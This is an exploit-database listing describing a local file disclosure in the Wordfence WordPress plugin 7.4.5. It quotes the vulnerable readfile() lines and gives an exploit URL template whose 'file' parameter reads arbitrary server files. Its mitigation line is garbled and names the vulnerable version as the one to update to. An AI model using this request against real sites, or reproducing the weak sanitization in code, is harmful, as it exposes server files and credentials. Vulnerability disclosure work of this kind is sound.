header-logo
Suggest Exploit
vendor:
Wordpress Plugin wordfence
by:
mehran feizi
8.8
CVSS
HIGH
Local File Disclosure
22
CWE
Product Name: Wordpress Plugin wordfence
Affected Version From: 7.4.5
Affected Version To: 7.4.5
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wordpress_plugin:wordfence
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

WordPress Plugin wordfence.7.4.5 – Local File Disclosure

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable Wordpress Plugin wordfence.7.4.5. The attacker can use the 'file' parameter to read arbitrary files from the server. The vulnerable code is located in the 'wordfenceClass.php' file, where the 'readfile' function is used to read the file specified in the 'file' parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the Wordpress Plugin wordfence.7.4.5.
Source

Exploit-DB raw data:

#  Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
#  Author: mehran feizi
#  Category: webapps
#  Date: 2020-02-12
#  vendor home page: https://wordpress.org/plugins/wordfence/

==============================================================================
Vulnerable Source:
5662: readfile readfile($localFile);
5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file']));
=================================================================================
Exploit:
localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD]
=================================================================================

Navigation

Suggest Exploit

Services By CQR